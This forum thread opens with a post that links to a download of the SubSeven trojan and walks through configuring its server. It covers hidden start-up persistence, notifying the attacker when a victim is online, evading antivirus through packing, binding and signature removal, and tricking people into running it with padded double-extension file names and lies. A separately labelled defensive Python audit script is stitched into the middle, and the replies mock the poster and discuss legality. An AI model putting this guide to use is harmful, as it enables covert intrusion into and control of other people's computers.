
SubSeven Trojan (Hacker's Tool)

Posted: Tue Jun 09, 2009 8:07 pm
by Dicem
Download Sub7 here: http://www.easy-share.com/1905610003/Sub7 v2.2.zip

SubSeven 2.2

The current most stable version. Basically, click on the section you need help with; I hope everything will be understandable and clear. You need to have a little bit of experience with s7's client because I am not going to explain every single thing. If you want to get a brief explanation about something just MouseOver it.

SubSeven Client supports all versions of Windows. You could use it under 9x, NT, 2k or XP. If you are having problems with XP, you have to do the following to fix some error problems.
1- Select your client executable or subseven.exe
2- Right click on it, then properties.
3- Click on Compatibility tab and check "Disable visual themes".
4- Select Run This program compatible for Windows 98/ME.

If you want to know more about the credits, click on the subseven icon in upper left, and if you want to get the latest news about subseven, click on read latest news. Finally, our status bar will be useful for us when we want to know if the victim is connected or not. ( idle - ready for action ) that's what it says now.
Main Menu here :

I put this section here because it's very simple and short and you are supposed to know how to deal with it.
1- You have to enter the IP address or ICQ uin to connect to a victim. If you don't know what an IP is, click here.
2- If you configured the server using editserver, you are supposed to know which port you used there.
3- Got static IP victims ? Click on the address book to save them.
4- Finally, the part that I am going to give you more explanation about. It will be the ip tools at the upper right near the " X ".
If you got your victim's host name or ICQ uin, you could use this tool to get the real IP. Just enter the hostname or the uin and resolve.

Subseven 2.2 Edit Server
This is the utility used to customise your servers to your own preferences. Click on the image in the area you need help with to view help. As before, in the client section, I hope everything will be easy for you to understand.

Options:

1-Start Up Methods

Start-Ups Section :

Click on the section you need help with.

In this section of the editserver program you may choose several different methods
which the server will use to start itself upon system reboot/startup.

* Registry-Run

When this option is checked, the server will add a key in "Run" under HKEY_LOCAL_MACHINE section of the system registry.

* Registry-RunServices

When this option is checked, the server will add a key in "RunServices" under HKEY_LOCAL_MACHINE section of the system registry.

Both these options are good methods of start-up, but are well known and easy to locate and remove.

* Keyname

Obviously, this gives the key added to the registry a name.
You can click on the ? symbols in this section and read hints pertaining to these entries.
* WIN.INI

Checking this option will add an entry to the run line of the WIN.INI file, located in C:\WINDOWS. The WIN.INI file is merely a system configuration file containing information and instructions for Windows to perform at start up, etc. Let's say you've named the server something like msapp.exe. In the WIN.INI file the entry would look like this:
run=msapp.exe
A normal WIN.INI file would have nothing at this line for run=
This also is a well known method and easy to remove.

* less known method

Click this option here, and a method that is less known by the average user will be invoked, offering a little more stealth.

* not known method

Obviously, this is much like the above option, only it is a method that is unknown to the average user.

I would explain in detail exactly what these methods are, but then some jo-blo victim who was reading might figure it out, and then they wouldn't be so stealthy anymore would they?

2-Notification Online

Notification Section :

This section deals with setting your server up to notify you when your victim is online.
Most of this is pretty much self-explanatory, but we will cover each one to help you, particularly the email part.

* Victim Name

Are you serious? do you really need me to explain this part??

* Enable ICQ notify to UIN

Ok it's pretty simple. Place a check in the box and enter your UIN (that's your ICQ number silly).
Note: This feature in edit server doesn't work anymore due to the fact that ICQ has changed the string for it since it was constructed; however, there are programs available that are updated with the current paging protocol that can simply be bound to the server so that ICQ notify will work.

* Enable IRC notify

Again, very easy and quite reliable, however, if you use this feature, you must use a server that does not require ident, or install a hidden ident daemon on your vic. Bind it with the server or something.
1- notify to: In this field, enter the channel name you wish the notify to come to, e.g., #infected.
2- irc server: Put the server address here, e.g., irc.sub7.org
3- port: Enter the server's port. (9 out of ten times this will be port 6667)
Click on the little ? for additional help.

* enable Email notify

OK, this is where most of you seem to have problems. So I will try to explain as best I can. It's really not difficult. The hardest part is finding an email server that works.
1- notify to: This is where you enter your e-mail address you are having the notify sent to, e.g., imacr33p@icqmail.com
2- server: This is where you enter the server address, e.g., mail.icqmail.com
3- user: Just leave this blank.
4- test: Press this button to test the server for your notify. Personally, I wouldn't rely on this due to the fact that most of the time it doesn't work, but test if you want to...

Click the ? for additional help.

Now, finding an e-mail server that works.
The requirements are servers that are anonymous, and do not filter.
The best you can do is to search on the web for anonymous smtp servers.
Search at cyberarmy.com. They usually have some pretty good lists there.
Then of course, there's always the reliable google.com search engine.
If it's out there, google will find it :)
I have placed a couple of servers here for you that work (or at least they did last time I checked), but finding one is really up to you.

# mail.cfm-resources.net
# mail.ifrance.net
# mail.icqmail.com

3-Installation

* Port settings
* Server password
* Protect server port and password
* IRC Bot
* Server name
* Melt server
* Enable fake error message
* Bind server

4-Protect server

Use this feature if you want total protection of your server. Place a check in the box, and enter a password, and no one will be able to read the settings in edit server much less re-edit it. This will prevent your server from being stolen. It can't be over-written with a new one, it can't be read, and it can't be edited without the password. And the vic can't find out who you are if he finds it cause he won't be able to read it ;)

5-Saving options

* Save new settings
* Save new copy of server with new settings
* Quit without saving

Intro :-

This section will show you some basic info about making your server.exe undetected and infecting other people using server.exe

Words you need to know :

1. Packer or Compressor - program used to "pack" or "compress" a file, which would decrease it in size.
2. Binary - Any file that is not a text file, this word is most commonly used to describe executables, but jpeg files can also be described as binary.
3. (Detected) String or Signature - a piece of information in a file that the AV searches for to see if the file is a virus or not
4. AV - Anti Virus software like McAfee, Norton, Kaspersky, or any other program that claims to be able to detect and clean viruses
5. Vic - person you have infected, or are trying to infect, given this name cause it's short for VICTIM (obviously)
6. Uploader - Mini-Trojan that has a very small server size and can be used to download a much bigger Trojan without the victim knowing.



How to Make a server Undetected :

Methods:

1) Getting a hold of an UNCOMPRESSED copy of a server, and then yourself, compressing it; it's always good to compress it yourself as to heighten the chances of it being undetected. Especially if you use a lesser known packer, other than UPX seeing as how the UPX binary signature it leaves is very common among most servers, so the detected string has a better chance of being better encrypted in a lesser known way with an un-popular packer. The UPX encrypted server is no doubt in any AV's database.

2) Binding the server to another file, preferably another EXE which would make the detected string more difficult to find with AV. It's possible to bind to a .JPG, but the result file would still need to have .EXE extension, or any other type of executable binary file extension for example: *.com or *.scr, and there's many more to be found by you...RESEARCH!

3) Binding the server to multiple files, which would also lessen the probability of the detected string being found by AV by incorporating the signatures of many other files, and this can hopefully "trick" the victim's AV.

4) It's recommended that you use an UPLOADER Trojan, because usually their server size is very very small, and they're much easier to use when binding with other files and not have the result file be too big as to tip off the victim of it being a virus. It's also much easier to compress these uploader servers and make them not only so much smaller, but also undetected. Good things :)

5) The next way is a very complicated method, and I won't go into it in detail here but just to whet your thirst for the idea, I'll explain a little. You can hex edit a server, and search for the detected string in the server and remove it. To take this idea to the next level you will need a hex editor, a SPLICER (program used to split files into smaller multiple parts), an uncompressed server and a reference telling you what string to look for, or you can look for it yourself. You should be able to splice the server into about 10-100 or more 2KB files, with these files, you should virus scan each one of them, and find out which one sets off the AV alarm, in this file is the virus signature, and you should match what you find inside this file with the same contents in the unspliced server. If you browse the web enough, you should be able to find out more information for this method. Good Luck.

Infection Methods by !happykl0wn (edited by FuX0reD) :

1) edit the server and rename it something like: "pic.jpg_____________________.exe" (use spaces instead of _) and then send it through AIM file transfer (not direct connect)... this method works especially well on ICQ file transfers...

Now if your server is undetected...you should be great to go.

2) I've found that blatantly lying to people works great too... I told someone I would send them an animation with monkeys playing guitar, but that I was really playing guitar and I made it look like the monkeys were. When u do this you should edit the server with the icon that looks like a video camera (whatever works, you know?)...and an error message with something like "File msdll video codec was not found"

3) Pretending to have warez on IRC can also get your way into someone's PC. This method works good because of all the warez fuss going on about IRC these days.

Most of these methods are included above in the Undetected section, but these can also be useful, the main one is number 2 :), and remember, any of these can also be used against you in an effort to infect j00r ass.
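
Added example (not part of the original post and not SubSeven code): a defender-side audit of the start-up locations the post names (the Run and RunServices keys under HKEY_LOCAL_MACHINE and the WIN.INI run= line), plus a check for the padded double-extension file name it describes. The sample WIN.INI and registry export are constructed, the function names are hypothetical, and checking load= alongside run=, the decoy-extension list and the baseline set are assumptions added here.

```python
import re
from pathlib import PureWindowsPath

# Parent of the two autostart keys named in the post (Run, RunServices).
CURRENT_VERSION = r"hkey_local_machine\software\microsoft\windows\currentversion"
AUTOSTART_LEAVES = {"run", "runservices"}
EXECUTABLE_EXTS = {".exe", ".com", ".scr"}   # extensions the post lists
DECOY_EXTS = {".jpg", ".gif", ".bmp", ".txt", ".avi", ".mpg"}   # assumed decoy list

# Constructed sample data; msapp.exe is the example file name used in the post.
SAMPLE_WIN_INI = """[windows]
load=
run=msapp.exe
[Desktop]
Wallpaper=(None)
"""
SAMPLE_REG = r'''REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"WinLoader"="C:\\WINDOWS\\msapp.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"KernelSvc"="msapp.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Ignored"="not-an-autostart.exe"
'''

def win_ini_autostarts(text):
    """Return (key, value) for non-empty run=/load= lines in the [windows] section."""
    found, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "windows" and "=" in line and not line.startswith(";"):
            key, value = (part.strip() for part in line.split("=", 1))
            if key.lower() in ("run", "load") and value:
                found.append((key.lower(), value))
    return found

def reg_autostarts(reg_text):
    """Return (key_leaf, value_name, command) from a regedit text export."""
    found, key = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            parent, _, leaf = line[1:-1].lower().rpartition("\\")
            key = leaf if parent == CURRENT_VERSION and leaf in AUTOSTART_LEAVES else None
        elif key:
            m = re.fullmatch(r'"(.*?)"="(.*)"', line)
            if m:   # string values only; exports escape each backslash as two
                found.append((key, m.group(1), m.group(2).replace("\\\\", "\\")))
    return found

def program_name(command):
    """Lower-cased file name of the program an autostart command launches."""
    m = re.match(r'"?(.+?\.(?:exe|com|scr|bat))', command, re.I)
    return PureWindowsPath(m.group(1) if m else command).name.lower()

def unbaselined(commands, baseline):
    """Commands whose program is missing from the host's known-good baseline."""
    return [c for c in commands if program_name(c) not in baseline]

def deceptive_name(filename):
    """True for an executable whose name is padded or carries a decoy extension."""
    stem, dot, ext = PureWindowsPath(filename).name.rpartition(".")
    if not dot or "." + ext.lower() not in EXECUTABLE_EXTS:
        return False
    padded = stem != stem.rstrip()   # whitespace pushes the real extension out of view
    inner = PureWindowsPath(stem.rstrip()).suffix.lower() in DECOY_EXTS
    return padded or inner

if __name__ == "__main__":
    cmds = [v for _, v in win_ini_autostarts(SAMPLE_WIN_INI)]
    cmds += [c for _, _, c in reg_autostarts(SAMPLE_REG)]
    print("review:", unbaselined(cmds, {"systray.exe"}))
    print("deceptive:", deceptive_name("pic.jpg" + " " * 20 + ".exe"))
```

The baseline passed to unbaselined() should be the set of program names recorded from a known-clean build of the host; anything it returns is a candidate for review, not a verdict.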

Posted: Tue Jun 09, 2009 10:28 pm
by Zaffron
.....

Dude, everyone knows that Subseven is a backdoor into your OWN systems and is also illegal in some countries like Germany. You sir, are stupid. :D Have a nice day.

Re: SubSeven Trojan (Hacker's Tool)

Posted: Tue Jun 09, 2009 11:32 pm
by WhiteKnight
Dicem wrote:Download Sub7

Script kiddies aren't welcome here... please get lost...

Posted: Wed Jun 10, 2009 8:24 am
by DanielG
Wow, subseven. That's so 5 years ago man, I bet all AV companies pick this shit up nowadays.

Posted: Wed Jun 10, 2009 6:03 pm
by Liidian
Sub7 is a "skiddie" tool, it's used to trick skiddies because it's actually just a trojan itself.

Posted: Thu Jun 11, 2009 2:28 am
by Zaffron
Which has been stated.

Posted: Sun Jul 01, 2012 1:13 am
by smeega
Pardon my ignorance, but isn't subseven illegal?

Posted: Mon Aug 27, 2012 1:51 pm
by liquidacid
Wow, that's more than 5 years ago, try 13 years old. Around that same time there was also Netbus, and Back Orifice. Also illegal in some countries, and a virus itself.

Posted: Sat Oct 27, 2012 7:53 pm
by Allosentient
smeega wrote: Pardon my ignorance, but isn't subseven illegal?
Programs like this are not illegal in the US. The act of using it to access a computer system fraudulently is illegal.